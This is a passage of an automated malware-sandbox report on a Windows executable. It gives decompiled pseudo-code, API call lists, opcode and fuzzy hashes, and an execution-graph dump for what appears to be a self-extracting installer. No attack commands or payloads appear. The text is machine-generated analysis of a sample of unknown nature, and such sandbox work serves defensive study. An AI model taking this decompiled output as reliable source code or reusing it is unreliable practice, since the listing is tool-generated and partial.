                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				_t15 = __ecx;
                                                                        				_t14 =  &(__ecx[1]);
                                                                        				_t10 = 0;
                                                                        				do {
                                                                        					_t3 =  *_t12;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t3 != 0);
                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                        					if(_t16 <= _t15) {
                                                                        						break;
                                                                        					}
                                                                        					if( *_t16 == 0x5c) {
                                                                        						L7:
                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						 *_t16 = _t10;
                                                                        						_t10 = 1;
                                                                        					} else {
                                                                        						_push(_t16);
                                                                        						continue;
                                                                        					}
                                                                        					L11:
                                                                        					return _t10;
                                                                        				}
                                                                        				if( *_t16 == 0x5c) {
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L11;
                                                                        			}









                                                                        0x00a365e8
                                                                        0x00a365ed
                                                                        0x00a365ef
                                                                        0x00a365f2
                                                                        0x00a365f4
                                                                        0x00a365f4
                                                                        0x00a365f6
                                                                        0x00a365f7
                                                                        0x00a36608
                                                                        0x00a36611
                                                                        0x00a36618
                                                                        0x00a3661c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3660e
                                                                        0x00a36623
                                                                        0x00a36625
                                                                        0x00a3663b
                                                                        0x00a3663b
                                                                        0x00a3663d
                                                                        0x00a36641
                                                                        0x00a36610
                                                                        0x00a36610
                                                                        0x00000000
                                                                        0x00a36610
                                                                        0x00a36644
                                                                        0x00a36647
                                                                        0x00a36647
                                                                        0x00a36621
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A32B33), ref: 00A36602
                                                                        • CharPrevA.USER32(?,00000000), ref: 00A36612
                                                                        • CharPrevA.USER32(?,00000000), ref: 00A36629
                                                                        • CharNextA.USER32(00000000), ref: 00A36635
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Prev$Next
                                                                        • String ID:
                                                                        • API String ID: 3260447230-0
                                                                        • Opcode ID: c37961ba780bf64311d343bbfae03fe61d31de200f78958bb25f72e4f31739e9
                                                                        • Instruction ID: 3c9e091bfe455270b85b178f107b94664f49c5e0202f06582b189ad01a6fb337
                                                                        • Opcode Fuzzy Hash: c37961ba780bf64311d343bbfae03fe61d31de200f78958bb25f72e4f31739e9
                                                                        • Instruction Fuzzy Hash: 12F028320041A07EE7365B689C88CBBBF9CCFAB395F2942AFF4D282011D7150D078671
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A369B0() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr* _t5;
                                                                        				void* _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        
                                                                        				 *0xa381f8 = E00A36C70();
                                                                        				__set_app_type(E00A36FBE(2));
                                                                        				 *0xa388a4 =  *0xa388a4 | 0xffffffff;
                                                                        				 *0xa388a8 =  *0xa388a8 | 0xffffffff;
                                                                        				_t4 = __p__fmode();
                                                                        				_t11 =  *0xa38528; // 0x0
                                                                        				 *_t4 = _t11;
                                                                        				_t5 = __p__commode();
                                                                        				_t12 =  *0xa3851c; // 0x0
                                                                        				 *_t5 = _t12;
                                                                        				_t6 = E00A37000();
                                                                        				if( *0xa38000 == 0) {
                                                                        					__setusermatherr(E00A37000);
                                                                        				}
                                                                        				E00A371EF(_t6);
                                                                        				return 0;
                                                                        			}








                                                                        0x00a369b7
                                                                        0x00a369c2
                                                                        0x00a369c8
                                                                        0x00a369cf
                                                                        0x00a369d8
                                                                        0x00a369de
                                                                        0x00a369e4
                                                                        0x00a369e6
                                                                        0x00a369ec
                                                                        0x00a369f2
                                                                        0x00a369f4
                                                                        0x00a36a00
                                                                        0x00a36a07
                                                                        0x00a36a0d
                                                                        0x00a36a0e
                                                                        0x00a36a15

                                                                        APIs
                                                                          • Part of subcall function 00A36FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A36FC5
                                                                        • __set_app_type.MSVCRT ref: 00A369C2
                                                                        • __p__fmode.MSVCRT ref: 00A369D8
                                                                        • __p__commode.MSVCRT ref: 00A369E6
                                                                        • __setusermatherr.MSVCRT ref: 00A36A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: dc8fe1ac99cc61bdf958b6e255f1aa50804a9ecd09f79ab0132d3874a1d4f77b
                                                                        • Instruction ID: 80bf0f5cbbf60fc0c687180d6e135b499a274feec342aef14426ffaac320e824
                                                                        • Opcode Fuzzy Hash: dc8fe1ac99cc61bdf958b6e255f1aa50804a9ecd09f79ab0132d3874a1d4f77b
                                                                        • Instruction Fuzzy Hash: C2F015B0508301DFC768EBF0EE0A6597BA1FB25331F104A09F4A2862F1CF7E8542CA11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:26.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:969
                                                                        Total number of Limit Nodes:43
                                                                        execution_graph 3128 f86ef0 3129 f86f2d 3128->3129 3131 f86f02 3128->3131 3130 f86f27 ?terminate@ 3130->3129 3131->3129 3131->3130 3132 f834f0 3133 f83504 3132->3133 3137 f835b8 3132->3137 3134 f8351b 3133->3134 3135 f835be GetDesktopWindow 3133->3135 3133->3137 3139 f8354f 3134->3139 3140 f8351f 3134->3140 3154 f843d0 6 API calls 3135->3154 3136 f83526 3137->3136 3141 f83671 EndDialog 3137->3141 3139->3136 3144 f83559 ResetEvent 3139->3144 3140->3136 3143 f8352d TerminateThread EndDialog 3140->3143 3141->3136 3143->3136 3147 f844b9 20 API calls 3144->3147 3145 f8361d SetWindowTextA CreateThread 3145->3136 3148 f83646 3145->3148 3146 f835e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3146->3145 3149 f83581 3147->3149 3150 f844b9 20 API calls 3148->3150 3151 f8359b SetEvent 3149->3151 3153 f8358a SetEvent 3149->3153 3150->3137 3152 f83680 4 API calls 3151->3152 3152->3137 3153->3136 3155 f84463 SetWindowPos 3154->3155 3157 f86ce0 4 API calls 3155->3157 3158 f835d6 3157->3158 3158->3145 3158->3146 3159 f869b0 3160 f869b5 3159->3160 3168 f86fbe GetModuleHandleW 3160->3168 3162 f869c1 __set_app_type __p__fmode __p__commode 3163 f869f9 3162->3163 3164 f86a0e 3163->3164 3165 f86a02 __setusermatherr 3163->3165 3170 f871ef _controlfp 3164->3170 3165->3164 3167 f86a13 3169 f86fcf 3168->3169 3169->3162 3170->3167 3171 f87270 _except_handler4_common 3172 f86bef _XcptFilter 2196 f86a60 2213 f87155 2196->2213 2198 f86a65 2199 f86a76 GetStartupInfoW 2198->2199 2200 f86a93 2199->2200 2201 f86aa8 2200->2201 2202 f86aaf Sleep 2200->2202 2203 f86ac7 _amsg_exit 2201->2203 2205 f86ad1 2201->2205 2202->2200 2203->2205 2204 f86b13 _initterm 2208 f86b2e __IsNonwritableInCurrentImage 2204->2208 2205->2204 2207 f86af4 2205->2207 2205->2208 2206 f86bd6 _ismbblead 2206->2208 2208->2206 2210 f86c1e 2208->2210 2211 f86bbe exit 2208->2211 2218 f82bfb GetVersion 2208->2218 2210->2207 2212 f86c27 _cexit 2210->2212 2211->2208 2212->2207 2214 f8717a 2213->2214 2215 f8717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2213->2215 2214->2215 2216 f871e2 2214->2216 2217 f871cd 2215->2217 2216->2198 2217->2216 2219 f82c0f 2218->2219 2220 f82c50 2218->2220 2219->2220 2222 f82c13 GetModuleHandleW 2219->2222 2235 f82caa memset memset memset 2220->2235 2222->2220 2224 f82c22 GetProcAddress 2222->2224 2224->2220 2232 f82c34 2224->2232 2225 f82c8e 2227 f82c9e 2225->2227 2228 f82c97 CloseHandle 2225->2228 2227->2208 2228->2227 2232->2220 2233 f82c89 2330 f81f90 2233->2330 2347 f8468f FindResourceA SizeofResource 2235->2347 2238 f82e30 2241 f844b9 20 API calls 2238->2241 2239 f82d2d CreateEventA SetEvent 2240 f8468f 7 API calls 2239->2240 2242 f82d57 2240->2242 2243 f82f06 2241->2243 2244 f82d5b 2242->2244 2245 f82d7d 2242->2245 2352 f86ce0 2243->2352 2357 f844b9 2244->2357 2247 f82e1f 2245->2247 2250 f8468f 7 API calls 2245->2250 2386 f85c9e 2247->2386 2252 f82d9f 2250->2252 2251 f82c62 2251->2225 2276 f82f1d 2251->2276 2252->2244 2254 f82da3 CreateMutexA 2252->2254 2254->2247 2258 f82dbd GetLastError 2254->2258 2255 f82e3a 2256 f82e52 FindResourceA 2255->2256 2257 f82e43 2255->2257 2261 f82e6e 2256->2261 2262 f82e64 LoadResource 2256->2262 2412 f82390 2257->2412 2258->2247 2260 f82dca 2258->2260 2263 f82dea 2260->2263 2264 f82dd5 2260->2264 2267 f82d6e 2261->2267 2427 f836ee GetVersionExA 2261->2427 2262->2261 2266 f844b9 20 API calls 2263->2266 2265 f844b9 20 API calls 2264->2265 2268 f82de8 2265->2268 2269 f82dff 2266->2269 2267->2243 2271 f82e04 CloseHandle 2268->2271 2269->2247 2269->2271 2271->2243 2277 f82f6c 2276->2277 2278 f82f3f 2276->2278 2571 f85164 2277->2571 2280 f82f5f 2278->2280 2551 f851e5 2278->2551 2704 f83a3f 2280->2704 2282 f82f71 2312 f83041 2282->2312 2586 f855a0 2282->2586 2288 f86ce0 4 API calls 2290 f82c6b 2288->2290 2289 f82f86 GetSystemDirectoryA 2291 f8658a CharPrevA 2289->2291 2317 f852b6 2290->2317 2292 f82fab LoadLibraryA 2291->2292 2293 f82fc0 GetProcAddress 2292->2293 2294 f82ff7 FreeLibrary 2292->2294 2293->2294 2297 f82fd6 DecryptFileA 2293->2297 2295 f83006 2294->2295 2296 f83017 SetCurrentDirectoryA 2294->2296 2295->2296 2636 f8621e GetWindowsDirectoryA 2295->2636 2298 f83054 2296->2298 2299 f83026 2296->2299 2297->2294 2308 f82ff0 2297->2308 2300 f83061 2298->2300 2647 f83b26 2298->2647 2302 f844b9 20 API calls 2299->2302 2305 f8307a 2300->2305 2300->2312 2656 f8256d 2300->2656 2307 f83037 2302->2307 2316 f83098 2305->2316 2667 f83ba2 2305->2667 2723 f86285 GetLastError 2307->2723 2308->2294 2312->2288 2314 f830af 2725 f84169 2314->2725 2316->2312 2316->2314 2318 f852d6 2317->2318 2319 f85316 2317->2319 2321 f85300 LocalFree LocalFree 2318->2321 2324 f852eb SetFileAttributesA DeleteFileA 2318->2324 2323 f85374 2319->2323 2327 f8535e SetCurrentDirectoryA 2319->2327 2328 f865e8 4 API calls 2319->2328 2320 f8538c 2322 f86ce0 4 API calls 2320->2322 2321->2318 2321->2319 2325 f82c72 2322->2325 2323->2320 3058 f81fe1 2323->3058 2324->2321 2325->2225 2325->2233 2329 f82390 13 API calls 2327->2329 2328->2327 2329->2323 2331 f81f9a 2330->2331 2335 f81f9f 2330->2335 2332 f81ea7 15 API calls 2331->2332 2332->2335 2333 f81ee2 GetCurrentProcess OpenProcessToken 2340 f81f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2333->2340 2342 f81f0e 2333->2342 2334 f81fcf ExitWindowsEx 2338 f81fd9 2334->2338 2336 f844b9 20 API calls 2335->2336 2337 f81fc0 2335->2337 2335->2338 2336->2337 2337->2333 2337->2334 2337->2338 2338->2225 2341 f81f6b ExitWindowsEx 2340->2341 2340->2342 2341->2342 2343 f81f1f 2341->2343 2344 f844b9 20 API calls 2342->2344 2345 f86ce0 4 API calls 2343->2345 2344->2343 2346 f81f8c 2345->2346 2346->2225 2348 f82d1a 2347->2348 2349 f846b6 2347->2349 2348->2238 2348->2239 2349->2348 2350 f846be FindResourceA LoadResource LockResource 2349->2350 2350->2348 2351 f846df memcpy_s FreeResource 2350->2351 2351->2348 2353 f86ce8 2352->2353 2354 f86ceb 2352->2354 2353->2251 2469 f86cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 f86e26 2356->2251 2358 f8455a 2357->2358 2359 f844fe LoadStringA 2357->2359 2363 f86ce0 4 API calls 2358->2363 2360 f84562 2359->2360 2361 f84527 2359->2361 2367 f845c9 2360->2367 2374 f8457e 2360->2374 2470 f8681f 2361->2470 2365 f84689 2363->2365 2365->2267 2366 f84536 MessageBoxA 2366->2358 2369 f845cd LocalAlloc 2367->2369 2370 f84607 LocalAlloc 2367->2370 2369->2358 2376 f845f3 2369->2376 2370->2358 2372 f845c4 2370->2372 2377 f8462d MessageBeep 2372->2377 2374->2374 2375 f84596 LocalAlloc 2374->2375 2375->2358 2378 f845af 2375->2378 2379 f8171e _vsnprintf 2376->2379 2380 f8681f 10 API calls 2377->2380 2487 f8171e 2378->2487 2379->2372 2381 f8463b 2380->2381 2383 f84645 MessageBoxA LocalFree 2381->2383 2384 f867c9 EnumResourceLanguagesA 2381->2384 2383->2358 2384->2383 2393 f85e17 2386->2393 2410 f85cc3 2386->2410 2387 f85dd0 2391 f85dec GetModuleFileNameA 2387->2391 2387->2393 2388 f86ce0 4 API calls 2390 f82e2c 2388->2390 2389 f85ced CharNextA 2389->2410 2390->2238 2390->2255 2392 f85e0a 2391->2392 2391->2393 2497 f866c8 2392->2497 2393->2388 2395 f86218 2506 f86e2a 2395->2506 2398 f85e36 CharUpperA 2399 f861d0 2398->2399 2398->2410 2400 f844b9 20 API calls 2399->2400 2401 f861e7 2400->2401 2402 f861f0 CloseHandle 2401->2402 2403 f861f7 ExitProcess 2401->2403 2402->2403 2404 f85f9f CharUpperA 2404->2410 2405 f86003 CharUpperA 2405->2410 2406 f8667f IsDBCSLeadByte CharNextA 2406->2410 2407 f85f59 CompareStringA 2407->2410 2408 f85edc CharUpperA 2408->2410 2409 f860a2 CharUpperA 2409->2410 2410->2387 2410->2389 2410->2393 2410->2395 2410->2398 2410->2404 2410->2405 2410->2406 2410->2407 2410->2408 2410->2409 2502 f8658a 2410->2502 2413 f824cb 2412->2413 2416 f823b9 2412->2416 2414 f86ce0 4 API calls 2413->2414 2415 f824dc 2414->2415 2415->2267 2416->2413 2417 f823e9 FindFirstFileA 2416->2417 2417->2413 2425 f82407 2417->2425 2418 f82479 2422 f82488 SetFileAttributesA DeleteFileA 2418->2422 2419 f82421 lstrcmpA 2420 f824a9 FindNextFileA 2419->2420 2421 f82431 lstrcmpA 2419->2421 2423 f824bd FindClose RemoveDirectoryA 2420->2423 2420->2425 2421->2420 2421->2425 2422->2420 2423->2413 2424 f8658a CharPrevA 2424->2425 2425->2418 2425->2419 2425->2420 2425->2424 2426 f82390 5 API calls 2425->2426 2426->2425 2428 f8372d 2427->2428 2429 f83737 2427->2429 2430 f844b9 20 API calls 2428->2430 2441 f839fc 2428->2441 2429->2428 2434 f838a4 2429->2434 2429->2441 2513 f828e8 2429->2513 2430->2441 2431 f86ce0 4 API calls 2432 f82e92 2431->2432 2432->2243 2432->2267 2442 f818a3 2432->2442 2434->2428 2435 f839c1 MessageBeep 2434->2435 2434->2441 2436 f8681f 10 API calls 2435->2436 2437 f839ce 2436->2437 2438 f839d8 MessageBoxA 2437->2438 2440 f867c9 EnumResourceLanguagesA 2437->2440 2438->2441 2440->2438 2441->2431 2443 f819b8 2442->2443 2444 f818d5 2442->2444 2446 f86ce0 4 API calls 2443->2446 2542 f817ee LoadLibraryA 2444->2542 2448 f819d5 2446->2448 2448->2267 2462 f86517 FindResourceA 2448->2462 2449 f818e5 GetCurrentProcess OpenProcessToken 2449->2443 2450 f81900 GetTokenInformation 2449->2450 2451 f81918 GetLastError 2450->2451 2452 f819aa CloseHandle 2450->2452 2451->2452 2453 f81927 LocalAlloc 2451->2453 2452->2443 2454 f81938 GetTokenInformation 2453->2454 2455 f819a9 2453->2455 2456 f8194e AllocateAndInitializeSid 2454->2456 2457 f819a2 LocalFree 2454->2457 2455->2452 2456->2457 2461 f8196e 2456->2461 2457->2455 2458 f81999 FreeSid 2458->2457 2459 f81975 EqualSid 2460 f8198c 2459->2460 2459->2461 2460->2458 2461->2458 2461->2459 2461->2460 2463 f8656b 2462->2463 2464 f86536 LoadResource 2462->2464 2465 f844b9 20 API calls 2463->2465 2464->2463 2466 f86544 DialogBoxIndirectParamA FreeResource 2464->2466 2467 f8657c 2465->2467 2466->2463 2466->2467 2467->2267 2469->2356 2471 f86857 GetVersionExA 2470->2471 2480 f8691a 2470->2480 2473 f8687c 2471->2473 2471->2480 2472 f86ce0 4 API calls 2474 f8452c 2472->2474 2475 f868a5 GetSystemMetrics 2473->2475 2473->2480 2474->2366 2481 f867c9 2474->2481 2476 f868b5 RegOpenKeyExA 2475->2476 2475->2480 2477 f868d6 RegQueryValueExA RegCloseKey 2476->2477 2476->2480 2478 f8690c 2477->2478 2477->2480 2491 f866f9 2478->2491 2480->2472 2482 f867e2 2481->2482 2483 f86803 2481->2483 2495 f86793 EnumResourceLanguagesA 2482->2495 2483->2366 2485 f867f5 2485->2483 2496 f86793 EnumResourceLanguagesA 2485->2496 2488 f8172d 2487->2488 2489 f8173d _vsnprintf 2488->2489 2490 f8175d 2488->2490 2489->2490 2490->2372 2492 f8670f 2491->2492 2493 f86740 CharNextA 2492->2493 2494 f8674b 2492->2494 2493->2492 2494->2480 2495->2485 2496->2483 2498 f866d5 2497->2498 2499 f866f3 2498->2499 2501 f866e5 CharNextA 2498->2501 2509 f86648 2498->2509 2499->2393 2501->2498 2503 f8659b 2502->2503 2503->2503 2504 f865b8 CharPrevA 2503->2504 2505 f865ab 2503->2505 2504->2505 2505->2410 2512 f86cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2506->2512 2508 f8621d 2510 f8665d IsDBCSLeadByte 2509->2510 2511 f86668 2509->2511 2510->2511 2511->2498 2512->2508 2514 f82a62 2513->2514 2521 f8290d 2513->2521 2516 f82a6e GlobalFree 2514->2516 2517 f82a75 2514->2517 2516->2517 2517->2434 2518 f82955 GlobalAlloc 2518->2514 2519 f82968 GlobalLock 2518->2519 2519->2514 2519->2521 2520 f82a20 GlobalUnlock 2520->2521 2521->2514 2521->2518 2521->2520 2522 f82a80 GlobalUnlock 2521->2522 2523 f82773 2521->2523 2522->2514 2524 f828b2 2523->2524 2525 f827a3 CharUpperA CharNextA CharNextA 2523->2525 2527 f828b7 GetSystemDirectoryA 2524->2527 2526 f827db 2525->2526 2525->2527 2528 f828a8 GetWindowsDirectoryA 2526->2528 2529 f827e3 2526->2529 2530 f828bf 2527->2530 2528->2530 2535 f8658a CharPrevA 2529->2535 2531 f828d2 2530->2531 2532 f8658a CharPrevA 2530->2532 2533 f86ce0 4 API calls 2531->2533 2532->2531 2534 f828e2 2533->2534 2534->2521 2536 f82810 RegOpenKeyExA 2535->2536 2536->2530 2537 f82837 RegQueryValueExA 2536->2537 2538 f8289a RegCloseKey 2537->2538 2539 f8285c 2537->2539 2538->2530 2540 f8287a 2539->2540 2541 f82867 ExpandEnvironmentStringsA 2539->2541 2540->2538 2541->2540 2543 f81890 2542->2543 2544 f81826 GetProcAddress 2542->2544 2547 f86ce0 4 API calls 2543->2547 2545 f81889 FreeLibrary 2544->2545 2546 f81839 AllocateAndInitializeSid 2544->2546 2545->2543 2546->2545 2549 f8185f FreeSid 2546->2549 2548 f8189f 2547->2548 2548->2443 2548->2449 2549->2545 2552 f8468f 7 API calls 2551->2552 2553 f851f9 LocalAlloc 2552->2553 2554 f8522d 2553->2554 2555 f8520d 2553->2555 2557 f8468f 7 API calls 2554->2557 2556 f844b9 20 API calls 2555->2556 2558 f8521e 2556->2558 2559 f8523a 2557->2559 2560 f86285 GetLastError 2558->2560 2561 f8523e 2559->2561 2562 f85262 lstrcmpA 2559->2562 2570 f85223 2560->2570 2563 f844b9 20 API calls 2561->2563 2564 f8527e 2562->2564 2565 f85272 LocalFree 2562->2565 2567 f8524f LocalFree 2563->2567 2568 f844b9 20 API calls 2564->2568 2566 f82f4d 2565->2566 2566->2277 2566->2280 2566->2312 2567->2566 2569 f85290 LocalFree 2568->2569 2569->2570 2570->2566 2572 f8468f 7 API calls 2571->2572 2573 f85175 2572->2573 2574 f8517a 2573->2574 2575 f851af 2573->2575 2577 f844b9 20 API calls 2574->2577 2576 f8468f 7 API calls 2575->2576 2579 f851c0 2576->2579 2578 f8518d 2577->2578 2578->2282 2738 f86298 2579->2738 2583 f851ce 2585 f844b9 20 API calls 2583->2585 2584 f851e1 2584->2282 2585->2578 2587 f8468f 7 API calls 2586->2587 2588 f855c7 LocalAlloc 2587->2588 2589 f855db 2588->2589 2590 f855fd 2588->2590 2592 f844b9 20 API calls 2589->2592 2591 f8468f 7 API calls 2590->2591 2593 f8560a 2591->2593 2594 f855ec 2592->2594 2595 f8560e 2593->2595 2596 f85632 lstrcmpA 2593->2596 2597 f86285 GetLastError 2594->2597 2598 f844b9 20 API calls 2595->2598 2599 f8564b LocalFree 2596->2599 2600 f85645 2596->2600 2601 f855f1 2597->2601 2602 f8561f LocalFree 2598->2602 2603 f8565b 2599->2603 2604 f85696 2599->2604 2600->2599 2624 f855f6 2601->2624 2602->2624 2612 f85467 49 API calls 2603->2612 2605 f8589f 2604->2605 2607 f856ae GetTempPathA 2604->2607 2608 f86517 24 API calls 2605->2608 2606 f86ce0 4 API calls 2609 f82f7e 2606->2609 2610 f856eb 2607->2610 2611 f856c3 2607->2611 2608->2624 2609->2289 2609->2312 2618 f8586c GetWindowsDirectoryA 2610->2618 2619 f85717 GetDriveTypeA 2610->2619 2610->2624 2750 f85467 2611->2750 2614 f85678 2612->2614 2616 f85680 2614->2616 2614->2624 2617 f844b9 20 API calls 2616->2617 2617->2601 2784 f8597d GetCurrentDirectoryA SetCurrentDirectoryA 2618->2784 2620 f85730 GetFileAttributesA 2619->2620 2629 f8572b 2619->2629 2620->2629 2624->2606 2625 f8597d 34 API calls 2625->2629 2626 f85467 49 API calls 2626->2610 2627 f82630 21 API calls 2627->2629 2629->2618 2629->2619 2629->2620 2629->2624 2629->2625 2629->2627 2630 f857c1 GetWindowsDirectoryA 2629->2630 2631 f8658a CharPrevA 2629->2631 2634 f85827 SetFileAttributesA 2629->2634 2635 f85467 49 API calls 2629->2635 2780 f86952 2629->2780 2630->2629 2632 f857e8 GetFileAttributesA 2631->2632 2632->2629 2633 f857fa CreateDirectoryA 2632->2633 2633->2629 2634->2629 2635->2629 2637 f86268 2636->2637 2638 f86249 2636->2638 2640 f8597d 34 API calls 2637->2640 2639 f844b9 20 API calls 2638->2639 2641 f8625a 2639->2641 2642 f86277 2640->2642 2643 f86285 GetLastError 2641->2643 2644 f86ce0 4 API calls 2642->2644 2645 f8625f 2643->2645 2646 f83013 2644->2646 2645->2642 2646->2296 2646->2312 2648 f83b2d 2647->2648 2648->2648 2649 f83b72 2648->2649 2650 f83b53 2648->2650 2851 f84fe0 2649->2851 2652 f86517 24 API calls 2650->2652 2653 f83b70 2652->2653 2654 f86298 10 API calls 2653->2654 2655 f83b7b 2653->2655 2654->2655 2655->2300 2657 f82622 2656->2657 2658 f82583 2656->2658 2905 f824e0 GetWindowsDirectoryA 2657->2905 2659 f825e8 RegOpenKeyExA 2658->2659 2660 f8258b 2658->2660 2662 f825e3 2659->2662 2663 f82609 RegQueryInfoKeyA 2659->2663 2660->2662 2664 f8259b RegOpenKeyExA 2660->2664 2662->2305 2665 f825d1 RegCloseKey 2663->2665 2664->2662 2666 f825bc RegQueryValueExA 2664->2666 2665->2662 2666->2665 2668 f83bdb 2667->2668 2683 f83bec 2667->2683 2669 f8468f 7 API calls 2668->2669 2669->2683 2670 f83c03 memset 2670->2683 2671 f83d13 2672 f844b9 20 API calls 2671->2672 2673 f83d26 2672->2673 2675 f83f4d 2673->2675 2676 f86ce0 4 API calls 2675->2676 2679 f83f60 2676->2679 2677 f83fd7 2677->2675 3003 f82267 2677->3003 2678 f83d7b CompareStringA 2678->2677 2678->2683 2679->2316 2681 f83fab 2684 f844b9 20 API calls 2681->2684 2683->2670 2683->2671 2683->2675 2683->2677 2683->2678 2683->2681 2685 f83f1e LocalFree 2683->2685 2686 f83f46 LocalFree 2683->2686 2690 f8468f 7 API calls 2683->2690 2691 f83cc7 CompareStringA 2683->2691 2701 f83e10 2683->2701 2913 f81ae8 2683->2913 2953 f8202a memset memset RegCreateKeyExA 2683->2953 2979 f83fef 2683->2979 2688 f83fbe LocalFree 2684->2688 2685->2677 2685->2683 2686->2675 2688->2675 2690->2683 2691->2683 2692 f83e1f GetProcAddress 2694 f83f64 2692->2694 2692->2701 2693 f83f92 2695 f844b9 20 API calls 2693->2695 2696 f844b9 20 API calls 2694->2696 2697 f83fa9 2695->2697 2698 f83f75 FreeLibrary 2696->2698 2699 f83f7c LocalFree 2697->2699 2698->2699 2700 f86285 GetLastError 2699->2700 2700->2673 2701->2692 2701->2693 2702 f83eff FreeLibrary 2701->2702 2703 f83f40 FreeLibrary 2701->2703 2993 f86495 2701->2993 2702->2685 2703->2686 2705 f8468f 7 API calls 2704->2705 2706 f83a55 LocalAlloc 2705->2706 2707 f83a6c 2706->2707 2708 f83a8e 2706->2708 2710 f844b9 20 API calls 2707->2710 2709 f8468f 7 API calls 2708->2709 2712 f83a98 2709->2712 2711 f83a7d 2710->2711 2713 f86285 GetLastError 2711->2713 2714 f83a9c 2712->2714 2715 f83ac5 lstrcmpA 2712->2715 2722 f82f64 2713->2722 2716 f844b9 20 API calls 2714->2716 2717 f83ada 2715->2717 2718 f83b0d LocalFree 2715->2718 2719 f83aad LocalFree 2716->2719 2720 f86517 24 API calls 2717->2720 2718->2722 2719->2722 2721 f83aec LocalFree 2720->2721 2721->2722 2722->2277 2722->2312 2724 f8303c 2723->2724 2724->2312 2726 f8468f 7 API calls 2725->2726 2727 f8417d LocalAlloc 2726->2727 2728 f841a8 2727->2728 2729 f84195 2727->2729 2731 f8468f 7 API calls 2728->2731 2730 f844b9 20 API calls 2729->2730 2732 f841a6 2730->2732 2733 f841b5 2731->2733 2732->2312 2734 f841b9 2733->2734 2735 f841c5 lstrcmpA 2733->2735 2737 f844b9 20 API calls 2734->2737 2735->2734 2736 f841e6 LocalFree 2735->2736 2736->2732 2737->2736 2739 f8171e _vsnprintf 2738->2739 2740 f862c9 FindResourceA 2739->2740 2742 f862cb LoadResource LockResource 2740->2742 2743 f86353 2740->2743 2742->2743 2746 f862e0 2742->2746 2744 f86ce0 4 API calls 2743->2744 2745 f851ca 2744->2745 2745->2583 2745->2584 2747 f8631b FreeResource 2746->2747 2748 f86355 FreeResource 2746->2748 2749 f8171e _vsnprintf 2747->2749 2748->2743 2749->2740 2751 f8548a 2750->2751 2768 f8551a 2750->2768 2811 f853a1 2751->2811 2753 f85581 2757 f86ce0 4 API calls 2753->2757 2756 f85495 2756->2753 2760 f8550c 2756->2760 2761 f854c2 GetSystemInfo 2756->2761 2762 f8559a 2757->2762 2758 f8553b CreateDirectoryA 2763 f85577 2758->2763 2764 f85547 2758->2764 2759 f8554d 2759->2753 2765 f8597d 34 API calls 2759->2765 2766 f8658a CharPrevA 2760->2766 2772 f854da 2761->2772 2762->2624 2774 f82630 GetWindowsDirectoryA 2762->2774 2767 f86285 GetLastError 2763->2767 2764->2759 2770 f8555c 2765->2770 2766->2768 2769 f8557c 2767->2769 2822 f858c8 2768->2822 2769->2753 2770->2753 2773 f85568 RemoveDirectoryA 2770->2773 2771 f8658a CharPrevA 2771->2760 2772->2760 2772->2771 2773->2753 2775 f8265e 2774->2775 2776 f8266f 2774->2776 2778 f844b9 20 API calls 2775->2778 2777 f86ce0 4 API calls 2776->2777 2779 f82687 2777->2779 2778->2776 2779->2610 2779->2626 2781 f8696e GetDiskFreeSpaceA 2780->2781 2782 f869a1 2780->2782 2781->2782 2783 f86989 MulDiv 2781->2783 2782->2629 2783->2782 2785 f859bb 2784->2785 2786 f859dd GetDiskFreeSpaceA 